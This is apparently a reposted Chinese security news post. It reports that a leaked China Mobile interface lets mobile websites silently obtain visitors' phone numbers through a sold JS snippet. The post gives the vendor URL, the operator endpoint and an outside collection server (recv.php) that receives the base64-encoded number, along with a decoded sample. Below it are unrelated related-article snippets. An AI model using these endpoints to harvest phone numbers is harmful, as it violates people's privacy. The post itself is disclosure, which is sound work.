中国移动某接口泄漏可导致访问网站就获取用户手机号(已经发现网站利用案例)

news/2025/1/11 14:10:48/

有商家在出售获取手机号:http://112.124.4.229:808/member/my.php?mid=21&status=4

手机网站加载一段他们提供的js代码后,即可获取到访问者的移动手机号码,获取率很高,通过分析,是移动研究院那边的泄露漏洞!

通过抓包分析可以发现:

注:抓包要用谷歌浏览器伪装成手机访问,不然抓包不到,它们屏蔽了pc!

当用户访问手机网站后,会加载一段js,js请求访问移动研究院的IP:http://218.206.176.104:8080/api/cc.jsp?cmsn=Mm1JeVFaZW9YUjZxVEhoVVc2WGZTUT09&q=http%3A%2F%2F121.40.123.23%2Frecv.php%3F_f%3D185659aff8c4e814a5d3537d9efb98bf_-_id%3Dwxkj_-_inx%3D0_-_ref%3Dhttp%25253A%25252F%25252Flocalhost.com%25252F1.php_-_query%3D%252526id%25253Dwxkj%252526c%25253D3_-corp%3D

获取到手机号之后,会把手机号通过base64加密返回给 js请求的参数q的值,如上面的:

http://121.40.123.23/recv.php?_f=185659aff8c4e814a5d3537d9efb98bf_-_id=wxkj_-_inx=0_-_ref=http%3A%2F%2Flocalhost.com%2F1.php_-_query=%26id%3Dwxkj%26c%3D3_-corp=bnVsbCxNb3ppbGxhLzUuMCAoaVBob25lOyBDUFUgaVBob25lIE9TIDdfMCBsaWtlIE1hYyBPUyBY%20OyBlbi11cykgQXBwbGVXZWJLaXQvNTM3LjUxLjEgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9u%20LzcuMCBNb2JpbGUvMTFBNDY1IFNhZmFyaS85NTM3LjUz

参数corp 的值就是手机信息base64位加密后的,解密后可以发现内容为:

null,Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X; en-us) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53

如果是手机访问网站的话, null 就会是你的手机号,我电脑访问的,所以没手机号


http://www.ppmy.cn/news/498233.html

相关文章

中国地质大学武汉计算机学院吴越,计算机学院朱静副教授个人主页 中国地质大学(武汉)教师个人主页系统...

联系方式 [1] 邮编: b140a9e58539163c25f25208652a6948cc3bc2176220134b66703e37538e3d3a3d4d17cfdd2e221fc0f04e8cd4445ced1da4b42b2b90ce0a26ad7b2ce923eae7e733208df812b3bfb4a3edc023a515028ac5d4bc0ef3ef20f67dc7f4fc86dfad4ac27885a6dbf6ea28e5d76f048b4b910…

Android进阶难题:普通公司的程序员跟BAT大公司的技术差距在哪?该如何选择

说说差距,主要是:深度、求新。 1. 深度。拿我上家公司的同事的简历为例,他提到了Android中图片的动态加载。好家伙,这是一个比较有难度的问题,至少如果你不懂ClassLoader、一些系统对应的代码是搞不定的。但是深入地问…

NFC Bank card: 以移动浦发联名挂件卡解析qPBOC应用

原文这里:http://blog.sina.com.cn/s/blog_4df8400a0100xoof.html qPBOC的规范让人看的有些头晕,做开发的人也不知道究竟这个规范该怎么运用到实际需求中。好在目前有很多qPBOC的项目已经在实施了,可以让我们从中分析一些实际的案例&#xff…

中国联通计费侧H2协议接口实现

业务需求,前几天写了一个跟联通计费侧的接口,具体要求参见局方规范: 1 H2协议 遵循软件工程及制定协议标准的基本思想,本着接口易用、易理解、易交流的原则,为实现客服系统的规范性、开放性、扩展性、业务独立性…

移动开发素材大全

策划设计 icon下载 Easyicon:http://www.easyicon.net/ Findicons:http://findicons.com/ 淘宝icon库:http://www.iconfont.cn/ IconArchive:http://www.iconarchive.com/ Dryicons:http://dryicons.com/ Iconmonst…

BC26对接移动Andlink、电信AEP、联通Telit

01 — Andlink简介 AndLink是中国移动在2016年提出的一个用于智能硬件设备通信的协议,And体现了中国移动的“和”文化主题。Link则体现连接概念。 在万物互联的时代,无论是互联网巨头还是传统通信运营商都希望通过自身的行业地位和技术优势在未来的大时代…

移动飞信API接口

飞信报警 文章分类:操作系统 Linux飞信报警1.飞信linux程序下载 主程序: http://www.it-adv.net/fetion/downng/fetion20091117-linux.tar.gz2.安装 2.1. tar zxvf fetion20091117-linux.tar.gz 2.2. cd fx 2.3. cp fetion /usr/bin/ 2.4. 复制目录下其他文件…

移动边缘计算——MEC

摘自:https://www.sdnlab.com/19491.html 作者简介:李子姝,北京邮电大学未来网络理论与应用实验室 研一 CCN、NDN方向 在正式开始介绍移动边缘计算(Mobile Edge Computing,MEC)之前,先从我作为…